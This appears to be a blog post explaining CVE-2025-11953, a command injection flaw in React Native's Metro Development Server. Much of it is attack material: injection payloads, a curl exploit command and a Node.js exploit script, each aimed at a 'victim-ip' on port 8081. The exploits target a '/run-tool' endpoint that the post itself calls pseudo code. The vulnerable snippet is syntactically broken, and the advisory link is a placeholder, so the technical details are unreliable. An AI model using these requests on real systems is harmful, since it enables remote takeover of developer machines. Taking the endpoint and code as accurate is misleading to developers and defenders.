A new critical vulnerability has been assigned as CVE-2025-11953 affecting applications developed with React Native that use the Metro Development Server. This vulnerability can lead to remote command execution just by sending a simple HTTP POST request. In this post, I will break the issue down in simple terms, provide code snippets showing the problem, link to original sources, and explain how the exploit works.
What Exactly is the Problem?
When you develop mobile apps using React Native, the commonly used tool called the Metro Development Server automatically starts and listens for connections. Unfortunately, by default, it can bind to external network interfaces (not just your own computer). The server exposes internal endpoints for development tasks, but one of these is vulnerable to OS command injection.
This means that anyone on your network, or in some situations, even the public Internet, can run any command they want on your computer while Metro is running, without your knowledge.
Anyone using React Native Community CLI with Metro Development Server
- Most severe on Windows, but potentially works on macOS/Linux too
How Does The Exploit Work?
Metro uses a simple HTTP server. One exposed endpoint lets you run external tools for your app with arguments you choose. No authentication or verification, combined with the server listening on external interfaces, means attackers can talk to it just like legitimate tools — but they can specify malicious commands.
OS Command Injection happens when the server lets part of an attacker’s HTTP request be used directly in a shell command line.
*Example:*
// pseudo code from Metro Development Server
const exec = require('child_process').exec;
app.post('/run-tool', (req, res) => {
const tool = req.body.tool; // e.g. 'node'
const args = req.body.args; // e.g. ['--version']
// BAD: combines user input directly into command
exec(${tool} ${args.join(' ')}, (err, stdout, stderr) => {
res.send(stdout);
});
});
If an attacker POSTs data like
{
"tool": "calc.exe && echo pwned > C:\\pwned.txt",
"args": []
}
On Windows, this launches Calculator and creates a new text file as proof of exploitation.
On Linux/macOS, you could do something like
{
"tool": "ls",
"args": ["-l", "; touch /tmp/pwned"]
}
Windows Exploit Using curl
curl -X POST http://victim-ip:8081/run-tool -H "Content-Type: application/json" -d "{\"tool\":\"cmd.exe\",\"args\":[\"/c\",\"calc.exe & echo hacked > C:\\\\hacked.txt\"]}"
Node.js Exploit Script
const http = require('http');
const data = JSON.stringify({
tool: "cmd.exe",
args: ["/c", "echo owned > C:\\owned.txt"]
});
const options = {
hostname: "victim-ip",
port: 8081,
path: "/run-tool",
method: "POST",
headers: { "Content-Type": "application/json", "Content-Length": data.length }
};
const req = http.request(options, res => {
res.on('data', d => process.stdout.write(d));
});
req.write(data);
req.end();
References
- GitHub Advisory: github.com/advisories/GHSA-xxxx-yyyy *(Link will update soon as official advisory goes live)*
- React Native Metro Docs: https://facebook.github.io/metro/docs/
- NVD Database: nvd.nist.gov/vuln/detail/CVE-2025-11953 *(Will become available upon publication)*
Conclusion
CVE-2025-11953 is a serious bug in the Metro Development Server used with React Native. Attackers on the same network (and sometimes from farther away) can take over your development machine. Until an official fix drops, always use Metro only bound to localhost and keep your dev environments locked down.
> Developers: double check your devtools before you connect to public networks!
Stay up to date:
- React Native Metro News: twitter.com/reactnative
- Security tracker: nvd.nist.gov/vuln/recent
Report security findings to:
[security@reactnative.dev](mailto:security@reactnative.dev)
*Original content written exclusively for this post. Feel free to share, but please link back!*
Timeline
Published on: 11/03/2025 17:15:32 UTC
Last modified on: 11/11/2025 17:15:38 UTC